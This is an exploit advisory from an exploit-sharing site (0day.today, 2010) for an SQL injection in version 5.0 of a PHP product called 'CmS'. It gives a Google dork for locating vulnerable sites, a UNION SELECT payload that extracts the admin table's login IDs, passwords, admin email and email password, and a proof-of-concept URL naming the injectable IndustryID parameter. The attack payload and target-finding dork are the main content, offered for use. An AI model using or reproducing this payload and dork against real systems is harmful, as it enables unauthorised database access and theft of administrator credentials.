CmS (id) SQL Injection Vulnerability

2010-04-22T00:00:00
ID 1337DAY-ID-11926
Type zdt
Reporter spykit
Modified 2010-04-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ====================================
CmS (id) SQL Injection Vulnerability
====================================

-----------------------------------------------------------------------
CmS (id) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=
---------------------------------------------------------------
 
Exploitz:
~~~~~~~
 
union all select
1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from
admin--
 
 
SQLi p0c:
~~~~~~~
 
http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]
----------------------------------------------------------------



#  0day.today [2018-03-10]  #